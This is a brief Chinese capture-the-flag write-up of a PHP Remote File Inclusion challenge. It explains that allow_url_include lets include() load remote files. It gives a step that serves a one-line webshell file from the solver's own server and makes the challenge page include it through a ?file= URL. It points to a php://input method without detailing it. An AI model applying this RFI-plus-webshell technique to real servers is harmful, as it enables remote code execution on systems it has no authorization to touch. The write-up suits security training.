点击此处获得更好的阅读体验
WriteUp来源
本WP来自Jazz原创投稿
题目考点
PHP语言
include函数
一句话木马
解题思路
开局给出源代码
给咱一个phpinfo那么必然有他的道理
PHP的配置选项allow_url_include为ON的话,则include/require函数可以加载远程文件,这种漏洞被称为"远程文件包含漏洞(Remote File Inclusion RFI)"。
allow_url_fopen = On 是否允许打开远程文件 allow_url_include = On 是否允许include/require远程文件
去康康
解法一:(该题的常规解法)
在服务器中 mkdir一个文件夹 然后vi 一个yjh.txt
编辑一个一句话木马
随后用python启动一个http服务
Python3 -m http.server 8000
http://challenge-d46d08980443a4ef.sandbox.ctfhub.com:10080/?file=http://你的vps地址:8000/yjh.txt
解法二:
和之前的PHP://input解法一样
不再赘述,放图就行